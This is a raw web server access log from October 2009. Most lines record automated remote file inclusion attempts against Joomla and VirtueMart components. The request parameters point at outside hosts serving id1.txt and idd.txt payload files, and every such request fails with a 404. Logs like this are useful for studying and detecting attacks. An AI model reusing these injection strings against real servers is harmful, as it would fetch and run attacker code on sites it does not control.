114.108.177.238 - - [28/Oct/2009:00:14:26 -0400] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.htaqua.ru/libraries/joomla/plugin/id1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
114.108.177.238 - - [28/Oct/2009:00:14:26 -0400] "GET /logs/access_log.Q109061100/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.htaqua.ru/libraries/joomla/plugin/id1.txt??? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
93.93.131.94 - - [28/Oct/2009:00:14:30 -0400] "GET /logs/access_log.Q109090600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:14:32 -0400] "GET /logs/access_log.Q109081000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:14:37 -0400] "GET /logs/access_log.Q109090600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
114.108.177.238 - - [28/Oct/2009:00:14:50 -0400] "GET /logs/error_log.Q109072800/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.htaqua.ru/libraries/joomla/plugin/id1.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
93.93.131.94 - - [28/Oct/2009:00:14:51 -0400] "GET /logs/access_log.Q109081000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
114.108.177.238 - - [28/Oct/2009:00:14:53 -0400] "GET /logs/error_log.Q109072800/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.htaqua.ru/libraries/joomla/plugin/id1.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
93.93.131.94 - - [28/Oct/2009:00:14:59 -0400] "GET /logs/access_log.Q109052400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:14:59 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:14:59 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:15:00 -0400] "GET /logs/access_log.Q109052400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:15:01 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:15:01 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:15:06 -0400] "GET /logs/access_log.Q109052400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:15:06 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:15:07 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:15:08 -0400] "GET /logs/access_log.Q109081000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
69.72.215.82 - - [28/Oct/2009:00:15:19 -0400] "GET /logs/access_log.Q109081000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:15:19 -0400] "GET /logs/access_log.Q109081000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.831"
130.13.166.92 - - [28/Oct/2009:00:15:28 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118F26581E70E500A98908H+M37+ENG HTTP/1.1" 200 47191 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118F265D11B0350087D908H+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
93.93.131.94 - - [28/Oct/2009:00:15:28 -0400] "GET /logs/access_log.Q109072900//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:15:30 -0400] "GET /logs/access_log.Q109061100//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:15:30 -0400] "GET /logs/access_log.Q109072900//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:15:31 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:15:31 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:15:41 -0400] "GET /logs/access_log.Q109061100//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:15:41 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:15:41 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:15:43 -0400] "GET /logs/access_log.Q109072900//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
69.72.215.82 - - [28/Oct/2009:00:15:53 -0400] "GET /logs/access_log.Q109061100//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:15:53 -0400] "GET /logs/access_log.Q109061100//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:15:53 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:15:53 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:15:53 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:15:54 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.831"
130.13.166.92 - - [28/Oct/2009:00:15:53 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118F275F1C80A500523908H+M37+ENG HTTP/1.1" 200 47175 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118F26581E70E500A98908H+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
93.93.131.94 - - [28/Oct/2009:00:15:54 -0400] "GET /logs/access_log.Q109080500//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:15:54 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:15:54 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:15:57 -0400] "GET /logs/access_log.Q109061100//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:15:58 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:15:58 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
69.72.215.82 - - [28/Oct/2009:00:15:59 -0400] "GET /logs/access_log.Q109080500//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:15:59 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:15:59 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:15:59 -0400] "GET /logs/access_log.Q109080500//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:15:59 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:15:59 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.831"
93.93.131.94 - - [28/Oct/2009:00:16:08 -0400] "GET /logs/access_log.Q109080500//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:16:08 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:16:09 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
69.72.215.82 - - [28/Oct/2009:00:16:11 -0400] "GET /logs/access_log.Q109101100//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:16:11 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:16:11 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:16:11 -0400] "GET /logs/access_log.Q109101100//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:16:11 -0400] "GET /logs/access_log.Q109052500//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:16:11 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:16:12 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:16:12 -0400] "GET /logs/access_log.Q109052500//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.831"
61.100.5.136 - - [28/Oct/2009:00:16:12 -0400] "GET /logs/access_log.Q109071400//?path%5Bdocroot%5D=http://www.topumpitup.co.kr//zeroboard/dmp/id1??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
61.100.5.136 - - [28/Oct/2009:00:16:12 -0400] "GET /logs/access_log.Q109072900//?path%5Bdocroot%5D=http://www.topumpitup.co.kr//zeroboard/dmp/id1??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
93.93.131.94 - - [28/Oct/2009:00:16:13 -0400] "GET /logs/access_log.Q109080500//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:16:13 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:16:13 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
130.13.166.92 - - [28/Oct/2009:00:16:13 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118F275811907500797908H+M37+ENG HTTP/1.1" 200 46174 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118F275F1C80A500523908H+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
217.199.218.29 - - [28/Oct/2009:00:16:16 -0400] "GET /logs/access_log.Q109062600%20%20//index.php?view=videos&type=member&user_id=X[blind]&option=com_mytube&Itemid=http://ea3.fileave.com/fx29id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.199.218.29 - - [28/Oct/2009:00:16:16 -0400] "GET /logs/access_log.Q109060600%20%20//index.php?view=videos&type=member&user_id=X[blind]&option=com_mytube&Itemid=http://ea3.fileave.com/fx29id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
93.93.131.94 - - [28/Oct/2009:00:16:19 -0400] "GET /logs/access_log.Q109101100//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:16:19 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:16:19 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:16:19 -0400] "GET /logs/access_log.Q109052500//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:16:23 -0400] "GET /logs/access_log.Q109101100//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:16:23 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:16:24 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:16:24 -0400] "GET /logs/access_log.Q109052500//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:16:25 -0400] "GET /logs/access_log.Q109080800//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:16:26 -0400] "GET /logs/access_log.Q109101100//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:16:29 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:16:29 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:16:30 -0400] "GET /logs/access_log.Q109052500//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
69.72.215.82 - - [28/Oct/2009:00:16:32 -0400] "GET /logs/access_log.Q109061400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:16:32 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:16:32 -0400] "GET /logs/access_log.Q109061400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:16:32 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:16:32 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:16:32 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.831"
119.63.193.55 - - [28/Oct/2009:00:16:34 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.jp/spider/)"
